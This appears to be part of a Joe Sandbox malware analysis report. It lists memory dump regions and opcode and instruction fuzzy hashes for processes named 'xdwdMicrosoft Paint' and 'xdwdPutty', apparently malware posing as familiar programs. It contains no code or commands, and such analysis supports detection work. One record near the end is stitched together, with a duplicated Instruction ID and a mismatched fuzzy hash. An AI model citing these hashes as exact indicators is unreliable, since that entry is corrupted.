                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: 2feaf70c5292d3894e7e9b3a0eb67d5c49824a2d7104501bffea02d026b3e8c5
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 6DD0123160950DCECB4597A494053ED77A0EB45215FA0187AD10AD5181CE35C894C7C1
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f9b08a8c37c76eaf87d195de00e6564e57d654fc7b05aceafbd160e5fb98242
                              • Instruction ID: 8c22c1c4eef030d807c65ae87b93eb837aa6f5ea47b3f0877c1b01fa3fd9e487
                              • Opcode Fuzzy Hash: 0f9b08a8c37c76eaf87d195de00e6564e57d654fc7b05aceafbd160e5fb98242
                              • Instruction Fuzzy Hash: 14C0801170DC091B5640F15C549EB7D73D2D7EC171728413AD40DC3355DC34D9478342
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 10d17a231d44de07bbf44df1b9f6b86675bf093554cd162f7690a62644042ca5
                              • Instruction ID: d3608ebdb6dbe3f5e0598de8dbffb6d4381da8f715a6b81d793e9fb02882bff7
                              • Opcode Fuzzy Hash: 10d17a231d44de07bbf44df1b9f6b86675bf093554cd162f7690a62644042ca5
                              • Instruction Fuzzy Hash: EDD0123165A31689E758377966111A862C1EF45255B9404B9E90DC43A6FD2EC5C14350
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction ID: adf4ad0126fedaf94b5bbe15433207315d8566b567be6206b135e7a857037b5c
                              • Opcode Fuzzy Hash: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction Fuzzy Hash: A7B0141153D405555345F714C55D1F573D0D75C1047500D35544DC1155FC047D414345
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 238a9142db9b4191badb25bc8bc5ce770a1be75e1444b91e43ef2f163b31e348
                              • Instruction ID: 6ec7278da6bfdac1549249c7735ae339cc20a487a05de05e6bd66e45a0cf541b
                              • Opcode Fuzzy Hash: 238a9142db9b4191badb25bc8bc5ce770a1be75e1444b91e43ef2f163b31e348
                              • Instruction Fuzzy Hash: E3A00210B1580F4A63C4A12C041A37A41CBE7B9281BA450B7590DCA2D7DD155C420616
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 891d66d271f3bd8c09052b8f15df854e8e813781c73988dea7aca2a4eddf3f75
                              • Instruction ID: df6271653c82dc6b76d13d5f9e0a614842b365637e8c21dcd1285e8e2ed7e092
                              • Opcode Fuzzy Hash: 891d66d271f3bd8c09052b8f15df854e8e813781c73988dea7aca2a4eddf3f75
                              • Instruction Fuzzy Hash: 17410D31A1891ACFEB95EB6CD4596BC77E1FF68301F640479D40EE33A2EE286C418741
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c225515135592e440ffb53a90d124448e81d46f6bc2fe8b30d1a5b4af5f00f87
                              • Instruction ID: 9bf98a491e3342d471fa9bf4056dec568822131d575f531a45168d9d55559404
                              • Opcode Fuzzy Hash: c225515135592e440ffb53a90d124448e81d46f6bc2fe8b30d1a5b4af5f00f87
                              • Instruction Fuzzy Hash: 43419421C2C59699F379466CF4C24F9B3C1EB65720FA4107DDCA982BC7BC1C68A601C3
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 148d063a35f9af68ff0a4daa6095d27f384a69942ce65560de0671fb5eee902a
                              • Instruction ID: dc2e37966060c8c14059f73c0295228d17dc514b0ff76e9474188edaf0b64796
                              • Opcode Fuzzy Hash: 148d063a35f9af68ff0a4daa6095d27f384a69942ce65560de0671fb5eee902a
                              • Instruction Fuzzy Hash: 8E41C330E1C91ACFEB9AE7A894496B973D1EF64305F604079D50DC33E2EE2DA8568750
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51f88a1cf3086a17b18cf3b21917ac208c227862f7c96fe00e3c3f675cfc0287
                              • Instruction ID: a2d98f26482208d7be19085eebd3709d9f4a4b9377dd048a77804ab25c8f425d
                              • Opcode Fuzzy Hash: 51f88a1cf3086a17b18cf3b21917ac208c227862f7c96fe00e3c3f675cfc0287
                              • Instruction Fuzzy Hash: 6C41A001F1C51B46E68A77B861661BE0AE39F96307FE14834E14ED7BCFDD6DAA020291
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 79efa35a9a5ec952b1c3ed945460c97bca2a1aaac8a1623e494002b285c9c72e
                              • Instruction ID: 4b8f2c06f6e03279b1638272fcfea207bf51a6122d0f3c13177b5a0d00de738d
                              • Opcode Fuzzy Hash: 79efa35a9a5ec952b1c3ed945460c97bca2a1aaac8a1623e494002b285c9c72e
                              • Instruction Fuzzy Hash: 8341DA21F1891ACBEB96AB2CC0A56B927D3EF99312BA50435D40DC37D6DE38A8429341
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9e5a0b33be9e7d5de26cff8dcd99a69ca976a8d375c48f711dd29a1c732577c9
                              • Instruction ID: 4e03f32f1f1a50855908d5b0d5e303212d3c517720be79abc2115c0d5c3bf15e
                              • Opcode Fuzzy Hash: 9e5a0b33be9e7d5de26cff8dcd99a69ca976a8d375c48f711dd29a1c732577c9
                              • Instruction Fuzzy Hash: 81414B6188E3C24FE7A7863458256613FE1DF67214F2E41FBD588CB1E3EA4D180E8362
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d44737c7be511e231d852ca86bb8927b15334476fff81babba29d98fd987c65f
                              • Instruction ID: 93ed65d803b4e6cf3c5384637015f84946d6585964803b65b3be1aaafa745342
                              • Opcode Fuzzy Hash: d44737c7be511e231d852ca86bb8927b15334476fff81babba29d98fd987c65f
                              • Instruction Fuzzy Hash: CA413031A18D1A8FEB96EB6C84556BC77E1FFA8301F64017AD40DD7396EE25AC428740
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d93e342a3ba95f025994534e04679d5cef55852f5d5250749137255f2511e394
                              • Instruction ID: c2c0bd506c681f0628d8cb3ce210b9afcab01b46904af7d689d9adcf248a3d1d
                              • Opcode Fuzzy Hash: d93e342a3ba95f025994534e04679d5cef55852f5d5250749137255f2511e394
                              • Instruction Fuzzy Hash: C8412B61E0C80ACEEB96E72894562B877E1EF6D301F640975D40FD7792EE1868418BC1
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c70025a519b2d12a238f04d288441e538305c07719ade651f7d09fb59081490
                              • Instruction ID: 3ef722a3ea65767bf941f7fddd6e8a99c9ed935eabb27b0355955cd68942481b
                              • Opcode Fuzzy Hash: 0c70025a519b2d12a238f04d288441e538305c07719ade651f7d09fb59081490
                              • Instruction Fuzzy Hash: EE41D322C2C6A28FEB56672488552BA2BD4DF52310F7900F5E44DCB2D3DD5D7C46D6C2
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35d665009519e40e687f424f8fe8275dc1fb6781c7492ed22b53a93b0b089628
                              • Instruction ID: 019f3fafd3c7fea93a051b768b19fef997ac28d681d7c4ea47ebbeb1ea576e87
                              • Opcode Fuzzy Hash: 35d665009519e40e687f424f8fe8275dc1fb6781c7492ed22b53a93b0b089628
                              • Instruction Fuzzy Hash: 53311C31E1C93ACAEEEEA76880616BD67D1FF68701B650578D40ED33D2ED2CA8018791
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51fc2823ffd3452e8d10b484806f372d801390c90b5bdfb808267d8ac6b4ffe8
                              • Instruction ID: 9c1a5ef56311fdb6e530ca531c87a1294d2cf3110bf475d640a79f8a5d31c654
                              • Opcode Fuzzy Hash: 51fc2823ffd3452e8d10b484806f372d801390c90b5bdfb808267d8ac6b4ffe8
                              • Instruction Fuzzy Hash: F0311931A08A1C8FDF94EB68D885BEDB7F1FB68315F10416AD40ED3252DF34A9868B41
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d47551a08be09324713a5d19089427baf2e227bd43854a758680956525a522e
                              • Instruction ID: 4a3176911baa5c30f36f9c85a184f0a24d19f045a92824efa24c639adcc8d29b
                              • Opcode Fuzzy Hash: 3d47551a08be09324713a5d19089427baf2e227bd43854a758680956525a522e
                              • Instruction Fuzzy Hash: 13313E5080E3C68FE76B92644C25275BFE0DF23205F2959FBC589CA1E3ED1D681E8762
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c908dba49b9352c9e684a38f3d623f1b5886c50f6a72e556ea197644abc4a925
                              • Instruction ID: f54f7b6551cd80c3492b4285ced379b5a93401c0366941cf7ed19cd09001759e
                              • Opcode Fuzzy Hash: c908dba49b9352c9e684a38f3d623f1b5886c50f6a72e556ea197644abc4a925
                              • Instruction Fuzzy Hash: 9B315C31E1C91A8FEB95EB68D4556FDB3E1FFA8311F60057AD40DE32D2EE2868418750
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d81025305c76a445578cc1ecde4977639b6a597531bcf0898a889084fd365401
                              • Instruction ID: 9217a4ba7ecf6f2dea81d681b812011d2386df85439360d68f855c9d0bb6a841
                              • Opcode Fuzzy Hash: d81025305c76a445578cc1ecde4977639b6a597531bcf0898a889084fd365401
                              • Instruction Fuzzy Hash: 4B313A12C1C52786FFBEA26894A13B963C1DF32365F6A0476D89CA73C3ED1C6C8542C2
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a77a0d7605c613f1ae8d388ba5b19371e560abe65b6cde44f951bc94d6aab35f
                              • Instruction ID: 5e4e9b3ef734fdae8976502ae73285a8f50f0c12c7ba0178e9d752e8e93094db
                              • Opcode Fuzzy Hash: a77a0d7605c613f1ae8d388ba5b19371e560abe65b6cde44f951bc94d6aab35f
                              • Instruction Fuzzy Hash: 3F316D61A0D3C24FE717977898A22A47FB18F53210F2A01F7D089CB5E3D91D581B8363
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 777a6825df39b597991f4895261eb8942eebe3a919117e8aeded243c9a23edad
                              • Instruction ID: bf52fc600f6d7a992842ed61108dfc40a047eeb53ba41e666249609323b53051
                              • Opcode Fuzzy Hash: 777a6825df39b597991f4895261eb8942eebe3a919117e8aeded243c9a23edad
                              • Instruction Fuzzy Hash: 39316421D5D627CAEAABEB18D0B167923E1FF65301FB50935D80EE33C6DD18BC019251
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 634507dc47e19b58688d297c8d6fe583e9e1f9ccc1ae428b54c1a634e45676fa
                              • Instruction ID: 253b3da170b4c69a85da9dcbc1adbd1bcefc093abae3bfea6259440ed49a4d4a
                              • Opcode Fuzzy Hash: 634507dc47e19b58688d297c8d6fe583e9e1f9ccc1ae428b54c1a634e45676fa
                              • Instruction Fuzzy Hash: 98216D72D0C94B8EFBAAD5A8C81A37837D0DB74311F741A3AC51FD23D2ED28691A41C2
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 838b4ceecb55b586ec965462c57dd1d3309ba29a4de9a6a52ad0ea16d2ad1bae
                              • Instruction ID: 762f807d1ac015fb117330ad334cc77206d4b7036c0d3ba089587aea60c450ff
                              • Opcode Fuzzy Hash: 838b4ceecb55b586ec965462c57dd1d3309ba29a4de9a6a52ad0ea16d2ad1bae
                              • Instruction Fuzzy Hash: 57217F31E0D80ECEFB65AB6894556FE77E1EFA8311F640436D50DD3381DE2CA8568B81
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29973d225d794afa3e5d9607e4a727f19c07b4a445d727d751919d9ad3a9647b
                              • Instruction ID: 0aefe4bcd14a288ff13db197a509876a98b172c44988102e919671058dc2a831
                              • Opcode Fuzzy Hash: 29973d225d794afa3e5d9607e4a727f19c07b4a445d727d751919d9ad3a9647b
                              • Instruction Fuzzy Hash: B3211B31A1881ACFEB95EB68D4596BDB3E1FF68301F600479D50DD32E2EE2868418751
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction ID: 9002ab626b61203f6f0f812816529098946667846a7c0611d6b05d7fe192bab3
                              • Opcode Fuzzy Hash: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction Fuzzy Hash: 36312870518B8C8FEBA5DF28C845BD97BE1FF98710F10866AE84DC7255CB38A945CB81
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50248f05e20bc7a0744ac30ccd698c5542182a09322f61311d4e308b19cad768
                              • Instruction ID: 063524ed8de24f5fc687b809a18f867035c5124e2e83b85b56a2f9e7d778ac27
                              • Opcode Fuzzy Hash: 50248f05e20bc7a0744ac30ccd698c5542182a09322f61311d4e308b19cad768
                              • Instruction Fuzzy Hash: 40219A62C0C4478EFBAE9AA8881A2B837D0DF34315F791A3AC51FD23D2ED1C650A41D1
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a0695099b3b41b0727cffcaf2b78d4183927b9dadd794bdda6c7971b30ce0ff1
                              • Instruction ID: bc21f96e3d11058bf49013cebe88870e9d0c478a0e91b93d37a34ec48a65c91e
                              • Opcode Fuzzy Hash: a0695099b3b41b0727cffcaf2b78d4183927b9dadd794bdda6c7971b30ce0ff1
                              • Instruction Fuzzy Hash: 9D212930A1D91E9FEBA9EB6C84556B977E2EFA8301F61017AD40DD3391DF28A8418741
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e74ae497b4c8e42884fe564d809f685e0a66057717d5f9c1b8b2cbb58530c597
                              • Instruction ID: 2f1afded9d42683aff4c5a1bdfea59f7bcf318760c645c9a2b49eb5781b9b9df
                              • Opcode Fuzzy Hash: e74ae497b4c8e42884fe564d809f685e0a66057717d5f9c1b8b2cbb58530c597
                              • Instruction Fuzzy Hash: 3111D27180D3875FE71BA6248C065B53FA4CF53264F1401FBD19ACA1A3E819641A87A2
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f26baea07de6be616a26ab07bc93c56529cf6e0f0c93fafe8aad6c9364c826f8
                              • Instruction ID: 45b992b109b2ed06771466ead0b717f74370f6b78b2a298fff0aa38cbc255a6f
                              • Opcode Fuzzy Hash: f26baea07de6be616a26ab07bc93c56529cf6e0f0c93fafe8aad6c9364c826f8
                              • Instruction Fuzzy Hash: F0013671B0C60A4A970D6A1C74570BD77C2EBC9320B60557FF64FC36C7DD2AA417418A
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f8e1af21b871c5e02caaad795b9d46e6f07b43a015ecd8fd03754be349640579
                              • Instruction ID: 1999ab773c670efb77c66cd2b1ccaea0ac1e598392ef21a590c6fb041de781e1
                              • Opcode Fuzzy Hash: f8e1af21b871c5e02caaad795b9d46e6f07b43a015ecd8fd03754be349640579
                              • Instruction Fuzzy Hash: 27015232E0D51D89FFA9A24CE4436F863D1DB56324F540076D65E936C2DC19385283C1
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction ID: b2cece6c46afa4f15d84a62be63c499fcfbea378ad5de6ef99f56b2503834464
                              • Opcode Fuzzy Hash: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction Fuzzy Hash: D0012130B1C91ACFEB89E76C94596B877E2EF59305F600079D50DC33A2EE39A8528750
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bf92f1a6fa0ab9d5de42dc5f83ebab6bb3c9b52473543650cdab3dee9b9de94
                              • Instruction ID: ba7bf9781d12c8ec149836f3695ae36c182afd640774ff992fee526f6fd82b6f
                              • Opcode Fuzzy Hash: 6bf92f1a6fa0ab9d5de42dc5f83ebab6bb3c9b52473543650cdab3dee9b9de94
                              • Instruction Fuzzy Hash: 99018082D1C42B86FB917AACA4812BD76C0EB68354F660970D98DC32C2DD0C6C5502CA
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f643f545920ffd005f32005ded221a2ad2764ef88b3cf187221dca46008a1639
                              • Instruction ID: 836806c9d2671d4bc19259277d3728a74ca212e7d533c108232acfcf05c7412d
                              • Opcode Fuzzy Hash: f643f545920ffd005f32005ded221a2ad2764ef88b3cf187221dca46008a1639
                              • Instruction ID: 8a5f61c34fc75296c0e6e2eda12a82cf9d7e3383dde0aeab6877fd27610d1b16
                              • Opcode Fuzzy Hash: ac5e6c75e15fac26ea51e2672be123809c2140c20d2e233b2ad727a915728955
                              • Instruction Fuzzy Hash: 6641B630A28D1E8FEB95EB6C84652FCB7E1FF58311B6401BAE40DD7396DE25AC429740
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 402dfc5c1842625a50aac6c0268bb2b18fe0d4072ce9c69d08344a25a4181379
                              • Instruction ID: 4114ab3a00b90e9a1108c6bbf8beda95fe29c628a1ea68f3fdd22dbbcb5a4403
                              • Opcode Fuzzy Hash: 402dfc5c1842625a50aac6c0268bb2b18fe0d4072ce9c69d08344a25a4181379
                              • Instruction Fuzzy Hash: 8141FE61F2C91A8BEB94F76880B55BD26D7EB98312B650439E10DC33D6DE3DAC426340
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4a91c5da0219912bcf87029f3672469049a73e1be3cc2e319785cecc9fc6e63
                              • Instruction ID: feb031b93f4811739101f86427c460a0cabf9f29ab167a5f8c9579b985eaa6e7
                              • Opcode Fuzzy Hash: b4a91c5da0219912bcf87029f3672469049a73e1be3cc2e319785cecc9fc6e63
                              • Instruction Fuzzy Hash: 5E415B31A2C81A9FEB94EB68D4656BC77E5FF58301F24007AE50ED3392DE2868819740
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4647cd0f9e0a4e24ca780d21fd0e8100e397f712e3b2c0ad750210e09adddf4e
                              • Instruction ID: 7d9adb5e337acd34cb42d2ff174f516e72ba2b358e2f8a4e9f183ec3db03aed5
                              • Opcode Fuzzy Hash: 4647cd0f9e0a4e24ca780d21fd0e8100e397f712e3b2c0ad750210e09adddf4e
                              • Instruction Fuzzy Hash: 10311931A18A1C8FDF94EB68D889BEDB7F1FB58311F10416AD44ED3252DF34A9868B41
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
